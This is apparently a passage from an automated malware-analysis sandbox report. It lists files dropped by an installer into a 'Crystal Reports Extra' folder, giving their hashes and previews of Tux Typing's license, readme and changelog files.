                                                          MD5:E149094555DD89FE88D8836A51090DE6
                                                          SHA1:EECE6539C9FAD65B0DAC035AEF6B9920866941B0
                                                          SHA-256:7D6206D8F7DA57BC2E4A69804CC5796A146AF98C920BB6801BBEBE4335B09E32
                                                          SHA-512:58524DAB052147CA5162F0992ED030FEC1203726DB1634FAFB0B92802787374EFCD0F5E4D2F20DD7A58C38F49D01A98E9C00FDA03E6370BA73F83A922BB54F14
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\is-NE78S.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 3 icons, 48x48, 16 colors, 4 bits/pixel, 48x48, 8 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):15086
                                                          Entropy (8bit):5.750409332348987
                                                          Encrypted:false
                                                          SSDEEP:96:VFv6swSQHlNxbFlswv1EhGRjI5iMGgqexHw3eugeEeNesDeP4eTe02eVtVe7eEDu:tOzVFlssuIlvMvQwXeuD0Udl47m6zk
                                                          MD5:423CA0B47B073150089226A3E616702E
                                                          SHA1:62C33784525890C31C6AC65E29D22E4D304025B3
                                                          SHA-256:1732898BCCE38FC7724677F884C7643BBA1CA690302831557A134E18035C4718
                                                          SHA-512:A9E94F8F9376DC3D736D9AB458A2F3DCBC753311849B69A927ABA969874A2B4CC78648247D4D44B407140FB884BDE69F3DFEE6B6AC0622B4C949B85642E59416
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\ABOUT-NLS (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76502
                                                          Entropy (8bit):2.4185965872860735
                                                          Encrypted:false
                                                          SSDEEP:384:cvXuypQc+jWYla0GOtQBknkYVM/kLR78k/RPfkRr06uUxKQH6k+9i:c2aEWyZztmknkeM/kd78k5Pfk086kl
                                                          MD5:B5A080B27B5B4C1A160D2BED1FCFAF9F
                                                          SHA1:B50287B75A3B098301455E34C8D8E52A09FA8938
                                                          SHA-256:4C825530CA79E944B63C56ED30BE58EF792B4ADAB6F7F38ABAB8C054432F4A86
                                                          SHA-512:4EFCE9472E21B052B8FE8113DD3B5480586C06CD27C8535712B10BAE2F7E32F33530A9E8C8DA6F6D8FEAD682EE556EAEC0CDA2525CE9121EC95B6E25F3075696
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1 Notes on the Free Translation Project.***************************************..Free software is going international! The Free Translation Project is.a way to get maintainers of free software, translators, and users all.together, so that free software will gradually become able to speak many.languages. A few packages already provide translations for their.messages... If you found this `ABOUT-NLS' file inside a distribution, you may.assume that the distributed package does use GNU `gettext' internally,.itself available at your nearest GNU archive site. But you do _not_.need to install GNU `gettext' prior to configuring, installing or using.this package with messages translated... Installers will find here some useful hints. These notes also.explain how users should proceed for getting the programs to use the.available translations. They tell how people wanting to contribute and.work on translations can contact the appropriate team... When reporting bugs in the `intl/' direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\AUTHORS (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):4390
                                                          Entropy (8bit):5.0878631480288785
                                                          Encrypted:false
                                                          SSDEEP:48:bGKA1YUK6lqGCNsdksZXnA2TZUIZABZpA5DtDVr36ko18dpeQqCvQ48SN7N3kPCz:KKA1HCNsdk5QpvRqCvaw1kPC3flcL+
                                                          MD5:4B8E4F960D80B0458ACBEEA70D025895
                                                          SHA1:8222D99B7F2CC775471BF0B55502627A457202B5
                                                          SHA-256:37D3194DBD584985C5544E805E293C3F2A8833D7CCAF0935AC8678895665DCB3
                                                          SHA-512:E7CCBDFD356A67B757C7B119189AC2C5A4707017AFA589644C9B43EBD72640C73182353EEE74267F9CDB7C66C59EB4FC0E821147A34E16EEE0A347106B915C80
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing Original Author:.----------.Sam Hart <hart@geekcomix.com>..Current Maintainer and Lead Coder:.-------.David Bruce <davidstuartbruce@gmail.com>..Coders:.-------.David Bruce <davidstuartbruce@gmail.com>.Jesse Andrews <jdandr2@uky.edu>.Calvin Arndt <calarndt@tux4kids.org>.Sam Hart <hart@geekcomix.com>.Jacob Greig <bombastic@firstlinux.net>.Sreyas Kurumanghat.<k.sreyas@gmail.com>.Sreerenj Balachandran <bsreerenj@gmail.com>.Vimal Ravi <vimal_ravi@rediff.com>.Prince K. Antony <prince.kantony@gmail.com>.Mobin Mohan <mobinmohan@gmail.com>.Matthew Trey <tux4kids@treyhome.com>.Sarah Frisk <ssfrisk@gmail.com>..Packaging & Ports:.------------------.Holger Levsen <holger@debian.org> - (Debian packager).David Bruce <davidstuartbruce@gmail.com> - (Windows crossbuild using Linux host, OpenSUSE Build Service rpm packages, MacPorts build).Alex Shorthouse <ashorthouse@rsd13.org> - (more recent Mac OSX port).Luc Shrivers <Begasus@skynet.be> - (BeOS/Haiku port)..(previous packagers:).David Mar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\COPYING (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):15131
                                                          Entropy (8bit):4.682434970392502
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .. GNU GENERAL PUBLIC LICENSE... Version 2, June 1991.. Copyright (C) 1989, 1991 Free Software Foundation, Inc.. 675 Mass Ave, Cambridge, MA 02139, USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.License is intended to guarantee your freedom to share and change free.software--to make sure the software is free for all its users. This.General Public License applies to most of the Free Software.Foundation's software and to any other program whose authors commit to.using it. (Some other Free Software Foundation software is covered by.the GNU Library General Public License instead.) You can apply it to.your programs, too... When we speak of free software, we are referring to freedom, not.price. Our General Public Licenses are de
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\ChangeLog (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):29717
                                                          Entropy (8bit):4.7846516544735325
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 04 Apr 2010 (git.debian.org/tux4kids/tuxtype.git - tag = "version-1.8.1".[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.1..- Several minor enhancements - git commit messages now serving as..primary documentation of development, rather than this changelog...- Fish cascade backgrounds now selected randomly...- Fish cascade graphics now use true alpha channel rather than SDL..colorkey...- Some fixes related to file location of custom word lists...09 Nov 2009 (svn.debian.org/tux4kids - revision 1640) .[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.0. - Sarah Frisk's word list editor from GSoC 2009 has been merged in as. a new, somewhat "beta" feature...12 Sep 2009 (svn.debian.org/tux4kids - revision 1532) .[ David Bruce <davidstuartbruce@gmail.com> ]. - Media - new music files and backgrounds contributed by Caroline Ford,. some old sounds (the ones with suboptimal free licensing) removed - Tux. Typing is now 100% DFSG-compliant. Re
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\INSTALL (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):10644
                                                          Entropy (8bit):4.801280319778263
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing 1.8.1.04 Apr 2010..NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows. For GNU/Linux users, you.need the "*dev" files for the SDL libs listed below, and should have the.dev file for SDL_Pango if you want to display non-Western text. TuxType.will build successfully, but without SDL_Pango support, if this header/lib.is not found...Most GNU/Linux users can install Tux Typing with their distribution's .package manager (such as apt or yum). To build from source, you can grab.the tuxtype_w_fonts*tar.gz, untar it, and build with "./configure; make;.make install". You do not need Autotools unless you are building from.a Subversion repository checkout. MacOSX users and Windows users can.install with very user-friendly binary installer packages - DSB...The current web site is http://www.tux4kids.com..The developer mailing list is tux4kids-tuxtype-dev@lists.alioth.debian.org..Feel free to email with any feedback or
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\OFL (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4599
                                                          Entropy (8bit):4.991877820151237
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Copyright (c) <dates>, <Copyright Holder> (<URL|email>),.with Reserved Font Name <Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>),.with Reserved Font Name <additional Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>)...This Font Software is licensed under the SIL Open Font License, Version 1.1..This license is copied below, and is also available with a FAQ at:.http://scripts.sil.org/OFL...-----------------------------------------------------------.SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007.-----------------------------------------------------------..PREAMBLE.The goals of the Open Font License (OFL) are to stimulate worldwide.development of collaborative font projects, to support the font creation.efforts of academic and linguistic communities, and to provide a free and.open framework in which fonts may be shared and improved in partnership.with others...The OFL allows the licensed fonts to be used,
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\README (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3612
                                                          Entropy (8bit):4.707814791494116
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows - DSB...Tux Typing:.An Educational Typing Tutor Game Starring Tux, the Linux Penguin.----------------------------------------------------------------..(To install the game on your system, please read the INSTALL file.).. If you are interested in Translation/moving this game to another . language, please send a mail to .. David Bruce <davidstuartbruce@gmail.com>, . Holger Levsen <debian@layer-acht.org>, or to:.. <tux4kids-tuxtype-dev@lists.alioth.debian.org>.. Additional information on this subject is covered in "HowToTheme.html". in the "doc/en" directory of this package...(Updated 04 Apr 2010)..This is version 1.8.1 of Tux Typing...In Fish Cascade you control Tux as he searches for fish to eat. Fish fall.from the top of the screen. These fish have letters on them. Unforunately.for Tux, eating a fish with a letter on it will cause his stomach to.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\TODO (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1043
                                                          Entropy (8bit):4.6860266698980135
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Updated 04 Apr 2010..Briefly, here are some current issues:..Tuxtype:..- Code: still needs a lot of cleanup. Tuxtype could benefit markedly from the reorganization using libt4k-common...- Build: mingw-cross-env crossbuild not ready for general consumption....- SDL_mixer 1.2.11 exits unexpectedly on initial call to Mix_OpenAudio(), reason not yet clear....- SDL_Pango builds successfully, but resultant program does not display any text when run under Windows....- If SDL_Pango disabled, configure script fails to link to SDL_ttf...- Build: need current binary build for Mac OS-X..- Input methods: tuxtype does not correctly handle keyboard input that uses more than one keypress for each character (such as Asian languages). The input methods code from tuxpaint has been added to the source tree, but is not yet actually used...- "Content" - could use better lessons to actually teach touch typing in a systematic fashion...- Should display lesson names rather than simply file names, and would b
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\TuxType_port_Mac.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):4056
                                                          Entropy (8bit):4.947683257149111
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: How I Ported Tuxtype to Mac OS X:..**Note** I am writing this from memory. These steps should work, but if they do not, contact the tuxtype developer team and search google for answers. That is how I was able to port Tuxtype...**Note** My tuxtye.xcodeproj should exist in the Tuxtype SVN. Open that to see my settings for the project...Requirements: .1. Mac OS 10.4 or higher (10.3, SDL, and Quicktime causes an error, so use 10.4).2. Xcode 2.5 [a free download from Apple's website] (or Xcode 3 should work but has not been tested)...Steps to get Tuxtype working on a Mac:..1. Download the following source codes:. a. SDL (I used version 1.2.12) [http://www.libsdl.org/download-1.2.php]. b. SDL_image (I used version 1.2.6) [http://www.libsdl.org/projects/SDL_image/]. c. SDL_mixer (I used version 1.2.8) [http://www.libsdl.org/projects/SDL_mixer/]. d. SDL_ttf (I used version 2.0.9) [http://www.libsdl.org/projects/SDL_ttf/]..2. Once you have SDL, open the SDL direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\howtotheme.html (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):12081
                                                          Entropy (8bit):4.803085884480498
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">.<html>.<head>.<title>How to create a theme for Tux Typing 1.5.13</title>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">.</head>.<body bgcolor="#ffffff">.<h2>Theming in Tux Typing 1.5.13</h2>.<p><i><b>NOTE (Dec 10, 2008) - this document is not very current. Most importantly, native language support now uses the standard GNU gettext libraries. Also, font selection has been automated by use of SDL_Pango on platforms where is available (GNU/Linux, at this time). The handling of word lists and custom images is unchanged. This document will updated as the maintainer's time allows - DSB</i><b></p>..<p>A "Theme" is a method to change the data which Tuxtyping uses. While this could be used to change the game about Tux and fish, to a game about a Cat and mice, more likely you are interested in making Tuxtyping work in another language. (if you are intersted in creating a new graphical theme like "Racecar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-098P2.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):4390
                                                          Entropy (8bit):5.0878631480288785
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing Original Author:.----------.Sam Hart <hart@geekcomix.com>..Current Maintainer and Lead Coder:.-------.David Bruce <davidstuartbruce@gmail.com>..Coders:.-------.David Bruce <davidstuartbruce@gmail.com>.Jesse Andrews <jdandr2@uky.edu>.Calvin Arndt <calarndt@tux4kids.org>.Sam Hart <hart@geekcomix.com>.Jacob Greig <bombastic@firstlinux.net>.Sreyas Kurumanghat.<k.sreyas@gmail.com>.Sreerenj Balachandran <bsreerenj@gmail.com>.Vimal Ravi <vimal_ravi@rediff.com>.Prince K. Antony <prince.kantony@gmail.com>.Mobin Mohan <mobinmohan@gmail.com>.Matthew Trey <tux4kids@treyhome.com>.Sarah Frisk <ssfrisk@gmail.com>..Packaging & Ports:.------------------.Holger Levsen <holger@debian.org> - (Debian packager).David Bruce <davidstuartbruce@gmail.com> - (Windows crossbuild using Linux host, OpenSUSE Build Service rpm packages, MacPorts build).Alex Shorthouse <ashorthouse@rsd13.org> - (more recent Mac OSX port).Luc Shrivers <Begasus@skynet.be> - (BeOS/Haiku port)..(previous packagers:).David Mar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-6O94V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76502
                                                          Entropy (8bit):2.4185965872860735
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1 Notes on the Free Translation Project.***************************************..Free software is going international! The Free Translation Project is.a way to get maintainers of free software, translators, and users all.together, so that free software will gradually become able to speak many.languages. A few packages already provide translations for their.messages... If you found this `ABOUT-NLS' file inside a distribution, you may.assume that the distributed package does use GNU `gettext' internally,.itself available at your nearest GNU archive site. But you do _not_.need to install GNU `gettext' prior to configuring, installing or using.this package with messages translated... Installers will find here some useful hints. These notes also.explain how users should proceed for getting the programs to use the.available translations. They tell how people wanting to contribute and.work on translations can contact the appropriate team... When reporting bugs in the `intl/' direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-71NV9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):12081
                                                          Entropy (8bit):4.803085884480498
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">.<html>.<head>.<title>How to create a theme for Tux Typing 1.5.13</title>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">.</head>.<body bgcolor="#ffffff">.<h2>Theming in Tux Typing 1.5.13</h2>.<p><i><b>NOTE (Dec 10, 2008) - this document is not very current. Most importantly, native language support now uses the standard GNU gettext libraries. Also, font selection has been automated by use of SDL_Pango on platforms where is available (GNU/Linux, at this time). The handling of word lists and custom images is unchanged. This document will updated as the maintainer's time allows - DSB</i><b></p>..<p>A "Theme" is a method to change the data which Tuxtyping uses. While this could be used to change the game about Tux and fish, to a game about a Cat and mice, more likely you are interested in making Tuxtyping work in another language. (if you are intersted in creating a new graphical theme like "Racecar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-GB5QC.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1043
                                                          Entropy (8bit):4.6860266698980135
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Updated 04 Apr 2010..Briefly, here are some current issues:..Tuxtype:..- Code: still needs a lot of cleanup. Tuxtype could benefit markedly from the reorganization using libt4k-common...- Build: mingw-cross-env crossbuild not ready for general consumption....- SDL_mixer 1.2.11 exits unexpectedly on initial call to Mix_OpenAudio(), reason not yet clear....- SDL_Pango builds successfully, but resultant program does not display any text when run under Windows....- If SDL_Pango disabled, configure script fails to link to SDL_ttf...- Build: need current binary build for Mac OS-X..- Input methods: tuxtype does not correctly handle keyboard input that uses more than one keypress for each character (such as Asian languages). The input methods code from tuxpaint has been added to the source tree, but is not yet actually used...- "Content" - could use better lessons to actually teach touch typing in a systematic fashion...- Should display lesson names rather than simply file names, and would b
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-I8QQE.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3612
                                                          Entropy (8bit):4.707814791494116
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows - DSB...Tux Typing:.An Educational Typing Tutor Game Starring Tux, the Linux Penguin.----------------------------------------------------------------..(To install the game on your system, please read the INSTALL file.).. If you are interested in Translation/moving this game to another . language, please send a mail to .. David Bruce <davidstuartbruce@gmail.com>, . Holger Levsen <debian@layer-acht.org>, or to:.. <tux4kids-tuxtype-dev@lists.alioth.debian.org>.. Additional information on this subject is covered in "HowToTheme.html". in the "doc/en" directory of this package...(Updated 04 Apr 2010)..This is version 1.8.1 of Tux Typing...In Fish Cascade you control Tux as he searches for fish to eat. Fish fall.from the top of the screen. These fish have letters on them. Unforunately.for Tux, eating a fish with a letter on it will cause his stomach to.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-KDGPL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):15131
                                                          Entropy (8bit):4.682434970392502
                                                          Encrypted:false
                                                          SSDEEP:384:AEUwi5rRL67cyV12rPd34FomzM2/R+qWG:A7FCExGFzeqt
                                                          MD5:CBBD794E2A0A289B9DFCC9F513D1996E
                                                          SHA1:2D29C273FDA30310211BBF6A24127D589BE09B6C
                                                          SHA-256:67F82E045CF7ACFEF853EA0F426575A8359161A0A325E19F02B529A87C4B6C34
                                                          SHA-512:C1D6AA39A08542C0C92057946FA1E6A65759575DE1C446B0D11CDF922B2F41EB088B7DC007CD3858FF4AC8C22D6F02E4FAA94FF6A697064613F073C432FB1EF1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .. GNU GENERAL PUBLIC LICENSE... Version 2, June 1991.. Copyright (C) 1989, 1991 Free Software Foundation, Inc.. 675 Mass Ave, Cambridge, MA 02139, USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.License is intended to guarantee your freedom to share and change free.software--to make sure the software is free for all its users. This.General Public License applies to most of the Free Software.Foundation's software and to any other program whose authors commit to.using it. (Some other Free Software Foundation software is covered by.the GNU Library General Public License instead.) You can apply it to.your programs, too... When we speak of free software, we are referring to freedom, not.price. Our General Public Licenses are de
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-LH7R9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):4056
                                                          Entropy (8bit):4.947683257149111
                                                          Encrypted:false
                                                          SSDEEP:96:88AMGX2Jjro4obNTSdO7BUz6pZRgrKGTg:tApGJHoZtSw7arTTg
                                                          MD5:12CD9A17B7741CB9989FEA8AEBF82C6F
                                                          SHA1:B321C8B0122548853C9FCEDE1DCA4640C13711DD
                                                          SHA-256:685964CBDA0311A79D10B315C503B15A7CE3EF9EC60C62AD8CE73DBA21A5986B
                                                          SHA-512:488C19FE3D911FA5A8EC15E3712550BD1F6A2F3BEAF0A98E4432F86C77B891E044E724426F322FCA70B4D88E929F094454FCF890D2EEEC25B209447B95193FE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: How I Ported Tuxtype to Mac OS X:..**Note** I am writing this from memory. These steps should work, but if they do not, contact the tuxtype developer team and search google for answers. That is how I was able to port Tuxtype...**Note** My tuxtye.xcodeproj should exist in the Tuxtype SVN. Open that to see my settings for the project...Requirements: .1. Mac OS 10.4 or higher (10.3, SDL, and Quicktime causes an error, so use 10.4).2. Xcode 2.5 [a free download from Apple's website] (or Xcode 3 should work but has not been tested)...Steps to get Tuxtype working on a Mac:..1. Download the following source codes:. a. SDL (I used version 1.2.12) [http://www.libsdl.org/download-1.2.php]. b. SDL_image (I used version 1.2.6) [http://www.libsdl.org/projects/SDL_image/]. c. SDL_mixer (I used version 1.2.8) [http://www.libsdl.org/projects/SDL_mixer/]. d. SDL_ttf (I used version 2.0.9) [http://www.libsdl.org/projects/SDL_ttf/]..2. Once you have SDL, open the SDL direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-MKJK3.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4599
                                                          Entropy (8bit):4.991877820151237
                                                          Encrypted:false
                                                          SSDEEP:96:rmgAmgnPUibMxxUDfGkKnjfRU88f+BktjVKvR1wyQeQHDZoN:yiXsMPZW88f+XvR9QHtE
                                                          MD5:969851E3A70122069A4D9EE61DD5A2ED
                                                          SHA1:C450C836DB375B12AB7A4C10B09375513D905A68
                                                          SHA-256:CE243FD4A62B1B76C959FFBA6EC16A7A3146B2362D441AE4F9F7F32FC3750D6C
                                                          SHA-512:54B335554F88E01EF0B07ED5F20C7FBC86EDE2E6395BA53AFC7B5DDF8C7DA728309A70E178ACD5AA8AFD16BCDF64527A1ACBB54D51D693A2966D34218F963DCE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Copyright (c) <dates>, <Copyright Holder> (<URL|email>),.with Reserved Font Name <Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>),.with Reserved Font Name <additional Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>)...This Font Software is licensed under the SIL Open Font License, Version 1.1..This license is copied below, and is also available with a FAQ at:.http://scripts.sil.org/OFL...-----------------------------------------------------------.SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007.-----------------------------------------------------------..PREAMBLE.The goals of the Open Font License (OFL) are to stimulate worldwide.development of collaborative font projects, to support the font creation.efforts of academic and linguistic communities, and to provide a free and.open framework in which fonts may be shared and improved in partnership.with others...The OFL allows the licensed fonts to be used,
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-NGKMM.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):36160
                                                          Entropy (8bit):4.7594335666742
                                                          Encrypted:false
                                                          SSDEEP:192:n6RclftgswUxW/UJT57VEhtiS06VkndpfZsZKZgZjZo9qR9ILWZUZyZFZaZMZ7ZJ:BTgswUR7VEhGyBN
                                                          MD5:AADCC5C24B7AA66773A82C8DCF90DC3F
                                                          SHA1:35AB43174C9489801E957ED0E19E50ABD6ED655D
                                                          SHA-256:9C8C1508E4255C98C0ECBFFB6184C50711E32B2B150346CE2B53AA58BD5749DC
                                                          SHA-512:5127B56915677B5E1E17C8FB9B8B9B26BCA07B53E9585437B38B1E94F422EDA5ED7B59BA86DFBFE0247E75A8351C61BAE505874AE3D2A3410275AA51154CC6C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <HTML>.<BODY>.<H1>TuxType Custom Scripting Reference</H1>.<h3>Contents</h3>.<a href="#introduction">Introduction</a><BR>.<a href="#locations">File Locations</a><BR>.<a href="#basics">The Basics</a><BR>.<a href="#hierarchy">XML Tag Hierarchy</a><BR>.<a href="#samples">Samples</a><BR>.<a href="#tags">Tag Reference</a><BR>..<BR><BR><BR><BR>.<a name="introduction">.<h4>Introduction</h4>.Tuxtype lessons can be customized with relative ease. It just takes a little<BR>.imagination, and a text editor.<BR>.<BR>.<a name="locations">.<h4>File Locations</h4>.Tuxtype first looks in your language (theme) directory for lesson files<BR>.<B>(Non-English Users Only)</B><BR>.eg: (&lt;TuxType directory&gt;/data/themes/&lt;language&gt;/scripts/),<BR><BR>.or in the default directory if you are using TuxType in english<BR>.(&lt;TuxType directory&gt;/data/scripts/)<BR>.<BR>.If there is not a scripts folder in your language (theme) directory, You may<BR>.safely create it<BR>.<BR>.<a name="basics">.<h4>The Ba
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-Q5V6P.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):29717
                                                          Entropy (8bit):4.7846516544735325
                                                          Encrypted:false
                                                          SSDEEP:384:smHYO2QyLSEN5KmtCVtaMmy8dnMQxWMW0bbyyuE1T0+bTh1qWBHXYzI1W5L4V8Gd:1aQHej26aWvm6cC0WFmPY
                                                          MD5:DD4E1B9708EF55F30D06198198AD2B03
                                                          SHA1:34092F4338FD69E66F8C4525201BCF760FD55019
                                                          SHA-256:07DEC805477121755D2C4309547017BBF6AE4A439C8D3925B7D928CAB2FFEEA7
                                                          SHA-512:71A3423F3F68B99ECBAD311C00BBD00D9806037D71DDC5378D91D6E01EE64EF44DA8569DA027498D4F94CD0293C5DD504A042B64DEDF875DF92D9D96CE450352
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 04 Apr 2010 (git.debian.org/tux4kids/tuxtype.git - tag = "version-1.8.1".[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.1..- Several minor enhancements - git commit messages now serving as..primary documentation of development, rather than this changelog...- Fish cascade backgrounds now selected randomly...- Fish cascade graphics now use true alpha channel rather than SDL..colorkey...- Some fixes related to file location of custom word lists...09 Nov 2009 (svn.debian.org/tux4kids - revision 1640) .[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.0. - Sarah Frisk's word list editor from GSoC 2009 has been merged in as. a new, somewhat "beta" feature...12 Sep 2009 (svn.debian.org/tux4kids - revision 1532) .[ David Bruce <davidstuartbruce@gmail.com> ]. - Media - new music files and backgrounds contributed by Caroline Ford,. some old sounds (the ones with suboptimal free licensing) removed - Tux. Typing is now 100% DFSG-compliant. Re
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-RUFVL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):10644
                                                          Entropy (8bit):4.801280319778263
                                                          Encrypted:false
